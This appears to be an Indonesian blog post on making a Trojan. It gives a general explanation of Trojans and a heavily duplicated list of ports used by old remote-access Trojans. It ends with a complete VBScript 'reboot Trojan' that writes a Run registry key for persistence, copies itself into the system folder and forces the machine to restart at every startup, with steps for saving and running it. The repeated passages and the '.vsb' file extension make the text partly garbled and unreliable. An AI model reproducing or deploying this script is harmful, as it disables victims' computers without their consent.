Cara membuat Virus Trojan
cara membuat virus trojan.vsb
sekarang saya akan memberi tahu kalian
tentang virus trojan.
apa itu trojan ???™
- Sebuah program ilegal yang ada di dalam program yang dipercaya (maksudnya adalah program ilegal yang menginfeksi program komputer pada umumnya). Program ilegal ini menjalankan suatu aktivitas yang rahasia yang tidak diinginkan oleh user.
- Sebuah program yang dipercaya yang telah diubah dan ditambah kode ilegal didalamnya, kode ini menjalankan suatu fungsi yang rahasia dan tidak diinginkan oleh user.
- Semua program yang menjalankan fungsi yang semestinya, tapi karena ada suatu kode program didalamnya dan tidak diketahui oleh user, menjalankan suatu aktifitas yang tidak diinginkan oleh user.
Jadi kesimpulannya adalah Virus Trojan adalah suatu program berbahaya yang tampak sah dan berguna bagi komputer sehingga dapat berkompromi dengan keamanan komputer yang pada akhirnya dapat menyebabkan banyak kerusakan.
apa itu trojan ???™
- Sebuah program ilegal yang ada di dalam program yang dipercaya (maksudnya adalah program ilegal yang menginfeksi program komputer pada umumnya). Program ilegal ini menjalankan suatu aktivitas yang rahasia yang tidak diinginkan oleh user.
- Sebuah program yang dipercaya yang telah diubah dan ditambah kode ilegal didalamnya, kode ini menjalankan suatu fungsi yang rahasia dan tidak diinginkan oleh user.
- Semua program yang menjalankan fungsi yang semestinya, tapi karena ada suatu kode program didalamnya dan tidak diketahui oleh user, menjalankan suatu aktifitas yang tidak diinginkan oleh user.
Jadi kesimpulannya adalah Virus Trojan adalah suatu program berbahaya yang tampak sah dan berguna bagi komputer sehingga dapat berkompromi dengan keamanan komputer yang pada akhirnya dapat menyebabkan banyak kerusakan.
Asal nama Virus
Trojan??? ™
Trojan
bisa atau biasa juga disebut
RAT's atau Remote Administration Tools. Nama dari Trojan ini diambil dari mitologi
Yunani kuno tentang perang antara pihak Yunani dan Troya. Karena tidak bisa
menembus pertahanan pihak Troya, pihak Yunani memberikan hadiah berupa sebuah
patung kuda kayu raksasa sebagai pengakuan kemenangan pihak Troya. Mereka
menerima kuda raksasa itu dan kemudian membawanya pulang. Pada malam harinya,
pasukan Yunani yang berada didalam kuda tersebut keluar dan mulai menyerang
Troya.
Bagaimana Virus Trojan bekerja??? ™
Ketika korban menjalankan server ia akan membuka beberapa port yang spesifik dan menunggu untuk koneksi. Hal ini bisa menggunakan TCP atau UDP protokol. Ketika kita melakukan koneksi dengan alamat ip korban kita bisa melakukan apa saja karena server membiarkan kita melakukan fungsi yang ada pada Trojan dikomputer korban (setiap Trojan berbeda-beda dalam hal fasilitas yang ada). Beberapa Trojan restart setiap kali windows diload. Mereka memodifikasi win.ini atau system.ini agar Trojan bisa restart tapi beberapa Trojan baru menggunakan registry supaya mereka bisa restart. Trojan berkomunikasi seperti client dan server. Korban menjalankan server sedangkan penyerang mengirim perintah pada komputer yang terinfeksi dengan menggunakan client, dan server kemudian mengikuti apa yang diperintahkan oleh client.
Dibawah ini adalah daftar port yang biasa digunakan oleh Trojan :
Trojan
bisa atau biasa juga disebut
RAT's atau Remote Administration Tools. Nama dari Trojan ini diambil dari mitologi
Yunani kuno tentang perang antara pihak Yunani dan Troya. Karena tidak bisa
menembus pertahanan pihak Troya, pihak Yunani memberikan hadiah berupa sebuah
patung kuda kayu raksasa sebagai pengakuan kemenangan pihak Troya. Mereka
menerima kuda raksasa itu dan kemudian membawanya pulang. Pada malam harinya,
pasukan Yunani yang berada didalam kuda tersebut keluar dan mulai menyerang
Troya.Bagaimana Virus Trojan bekerja??? ™
Ketika korban menjalankan server ia akan membuka beberapa port yang spesifik dan menunggu untuk koneksi. Hal ini bisa menggunakan TCP atau UDP protokol. Ketika kita melakukan koneksi dengan alamat ip korban kita bisa melakukan apa saja karena server membiarkan kita melakukan fungsi yang ada pada Trojan dikomputer korban (setiap Trojan berbeda-beda dalam hal fasilitas yang ada). Beberapa Trojan restart setiap kali windows diload. Mereka memodifikasi win.ini atau system.ini agar Trojan bisa restart tapi beberapa Trojan baru menggunakan registry supaya mereka bisa restart. Trojan berkomunikasi seperti client dan server. Korban menjalankan server sedangkan penyerang mengirim perintah pada komputer yang terinfeksi dengan menggunakan client, dan server kemudian mengikuti apa yang diperintahkan oleh client.
Dibawah ini adalah daftar port yang biasa digunakan oleh Trojan :
- Masters Paradise|30129 - NetMonitor 1.x|7301
- Robo-Hack|5569 - NetMonitor 2.x|7306
- NetMonitor|7300 - NetMonitor 3.x|7307
- Portal of Doom|9872 - NetMonitor 4.x|7308
- iNi-Killer|9989 - ICKiller|7789
- DeepThroat|6670 - Remote Grab|7000
- DeepThroat|6771 - Priority|6969
- Firehotcker|5321 - GateCrasher|6969
- Sockets de Troie 1.x|5001 - Blade Runner 2.x|5402
- Sockets de Troie|5000 - Blade Runner 1.x|5401
- ICQTrojan|4590 - Blade Runner|5400
- Portal of Doom|3700 - WinCrash|4092
- The Invasor|2140 - Phineas Phucker|2801
- Bugs|2115 - Deep Throat|2140
- Trojan Cow|2001 - Ripper|2023
- VooDoo Doll|1245 - FTP99CMP|1492
- Ultors Trojan|1234 - BackDoor|1999
- Doly Trojan|1011 - Psyber Stream Server|1170
Shockrave|1981 -
WebEx|1001
- Shivka-Burka|1600 - SpySender|1807
- Satanz Backdoor|666 - Silencer|1001
- Portal of Doom 1.x|9873 - Senna Spy|11000
- Portal of Doom 2.x|9874 - Progenic Trojan|11223
- Portal of Doom 3.x|9875 - Hack?99 KeyLogger|12223
- Portal of Doom 4.x|10067 - GabanBus|1245
- Portal of Doom 5.x|10167 - NetBus|1245
- Whack-a-mole|12361 - GirlFriend|21544
- Whack-a-mole 1.x|12362 - Prosiak|22222
- Priority|16969 - Prosiak|33333
- Millennium|20001 - Evil FTP|23456
- NetBus 2 Pro|20034 - Ugly FTP|23456
- Delta|26274 - DeepBO|31338
- Back Orifice|31337 - NetSpy DK|31339
- Back Orifice|31338 - BOWhack|31666
- BigGluck|34324 - Masters Paradise 2.x|40423
- Shivka-Burka|1600 - SpySender|1807
- Satanz Backdoor|666 - Silencer|1001
- Portal of Doom 1.x|9873 - Senna Spy|11000
- Portal of Doom 2.x|9874 - Progenic Trojan|11223
- Portal of Doom 3.x|9875 - Hack?99 KeyLogger|12223
- Portal of Doom 4.x|10067 - GabanBus|1245
- Portal of Doom 5.x|10167 - NetBus|1245
- Whack-a-mole|12361 - GirlFriend|21544
- Whack-a-mole 1.x|12362 - Prosiak|22222
- Priority|16969 - Prosiak|33333
- Millennium|20001 - Evil FTP|23456
- NetBus 2 Pro|20034 - Ugly FTP|23456
- Delta|26274 - DeepBO|31338
- Back Orifice|31337 - NetSpy DK|31339
- Back Orifice|31338 - BOWhack|31666
- BigGluck|34324 - Masters Paradise 2.x|40423
- he Spy|40412 - Masters
Paradise 3.x|40426
- Masters Paradise|40421 - Sockets de Troie|50505
- Masters Paradise 1.x|40422 - Fore|50766
- Remote Windows Shutdown|53001 - Millenium |20000
- Telecommando|61466 - Devil 1.03 |65000
- Devil|65000 - NetMonitor| 7306
- The tHing|6400 - Streaming Audio Trojan| 1170
- NetBus 1.x|12346 - Socket23 |30303
- NetBus Pro 20034 - Gatecrasher |6969
- SubSeven|1243 - Telecommando | 61466
- NetSphere|30100 - Gjamer |12076
- Silencer |1001 - IcqTrojen| 4950
- Priotrity |16969 - Wincrash2| 2583
- Vodoo | 1245 - Netspy |1033
- Wincrash | 5742 - ShockRave | 1981
- Stealth Spy |555 - GirlFriend | 21554
- Pass Ripper |2023 - Phase0 | 555
- Attack FTP |666 - WhackJob | 23456
- Fore, Schwindler| 50766 - Senna Spy Trojans| 11000
- Tiny Telnet Server| 34324 - Kuang |30999
- RemoteWindowsShutdown | 53001 - Hackers Paradise | 456
- RoboHack |5569 - Doly Trojan | 1011
- Silencer | 1001 - FTP99CMP | 1492
- Striker | 2565 - Shiva Burka | 1600
- TheSpy | 40412 - Indoctrination | 6939
- Prosiak 0.47 | 22222 - Psyber Streaming Server | 1509
- ProgenicTrojan | 11223 - WebEx |1001
- PortalOfDoom | 9872 - Phineas | 2801
- InIkiller | 9989 - UglyFtp | 23456
- IcqTrojan | 4950 - Backdoor | 1999
- BladeRunner | 5400 - TrojanCow | 2001
- Remote Windows Shutdown | 53001 - iNi-Killer | 9989
- BigGluck, | 34324 - ICQKiller | 7789
- NetSpy DK | 31339 - Portal of Doom | 9875
- Hack?99 KeyLogger | 12223 - Firehotcker | 5321
- Master Paradise |40423 - BO jammerkillahV | 121
- Masters Paradise|40421 - Sockets de Troie|50505
- Masters Paradise 1.x|40422 - Fore|50766
- Remote Windows Shutdown|53001 - Millenium |20000
- Telecommando|61466 - Devil 1.03 |65000
- Devil|65000 - NetMonitor| 7306
- The tHing|6400 - Streaming Audio Trojan| 1170
- NetBus 1.x|12346 - Socket23 |30303
- NetBus Pro 20034 - Gatecrasher |6969
- SubSeven|1243 - Telecommando | 61466
- NetSphere|30100 - Gjamer |12076
- Silencer |1001 - IcqTrojen| 4950
- Priotrity |16969 - Wincrash2| 2583
- Vodoo | 1245 - Netspy |1033
- Wincrash | 5742 - ShockRave | 1981
- Stealth Spy |555 - GirlFriend | 21554
- Pass Ripper |2023 - Phase0 | 555
- Attack FTP |666 - WhackJob | 23456
- Fore, Schwindler| 50766 - Senna Spy Trojans| 11000
- Tiny Telnet Server| 34324 - Kuang |30999
- RemoteWindowsShutdown | 53001 - Hackers Paradise | 456
- RoboHack |5569 - Doly Trojan | 1011
- Silencer | 1001 - FTP99CMP | 1492
- Striker | 2565 - Shiva Burka | 1600
- TheSpy | 40412 - Indoctrination | 6939
- Prosiak 0.47 | 22222 - Psyber Streaming Server | 1509
- ProgenicTrojan | 11223 - WebEx |1001
- PortalOfDoom | 9872 - Phineas | 2801
- InIkiller | 9989 - UglyFtp | 23456
- IcqTrojan | 4950 - Backdoor | 1999
- BladeRunner | 5400 - TrojanCow | 2001
- Remote Windows Shutdown | 53001 - iNi-Killer | 9989
- BigGluck, | 34324 - ICQKiller | 7789
- NetSpy DK | 31339 - Portal of Doom | 9875
- Hack?99 KeyLogger | 12223 - Firehotcker | 5321
- Master Paradise |40423 - BO jammerkillahV | 121
bagaimana cara membuat
virus trojan ???™
- buka notepad
- cop-as action
dibawah ini :
----------------------------------------------------------------------------------------------------
rem - dlRB "DL
Reboot" Trojan script by D.L.
On Error Resume Next
dim FSobj,sysDir,generateCopy,newFile,fixedCode,procreateCopy,fileData
set FSobj=CreateObject("Scripting.FileSystemObject")
set sysDir = FSobj.GetSpecialFolder(1)
createRegKey "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\dlRB",sysDir&"\dlRB.vbs"
sub createRegKey(regKey,regVal)
set regEdit = CreateObject("WScript.Shell")
regEdit.RegWrite regKey,regVal
end sub
set generateCopy=FSobj.CreateTextFile(sysDir+"\dlRB.vbs")
generateCopy.close
set newFile = FSobj.OpenTextFile(WScript.ScriptFullname,1)
setFile()
fixedCode=replace(fileData,chr(94),"""")
set procreateCopy=FSobj.OpenTextFile(sysDir+"\dlRB.vbs",2)
procreateCopy.write fixedCode
procreateCopy.close
rebootSystem()
function setFile()
fileData="rem - ^dlRB^ by D.L." &vbcrlf& _
"strComputer = ^.^ " &vbcrlf& _
"Set objWMIService = GetObject(^winmgmts:^ _ " &vbcrlf& _
"& ^{impersonationLevel=impersonate,(Shutdown)}!\\^ & strComputer & ^\root\cimv2^)" &vbcrlf& _
"Set colOperatingSystems = objWMIService.ExecQuery _ " &vbcrlf& _
"(^Select * from Win32_OperatingSystem^)" &vbcrlf& _
"For Each objOperatingSystem in colOperatingSystems" &vbcrlf& _
"ObjOperatingSystem.Reboot()" &vbcrlf& _
"Next"
end function
function rebootSystem()
strComputer = "."
Set objWMIService = GetObject("winmgmts:" _
& "{impersonationLevel=impersonate,(Shutdown)}!\\" & strComputer & "\root\cimv2")
Set colOperatingSystems = objWMIService.ExecQuery _
("Select * from Win32_OperatingSystem")
For Each objOperatingSystem in colOperatingSystems
ObjOperatingSystem.Reboot()
Next
end function
--------------------------------------------------------------------------------------------------------------------
lalu save file dengan format vsb
Jika anda ingin mengaktifkan contoh nya dibawah ini.
contoh : trojan.vsb
lalu ganti txt. menjadi all Files
Jika ingin Me non aktifkan tinggal save dengan format txt
Komentar
Posting Komentar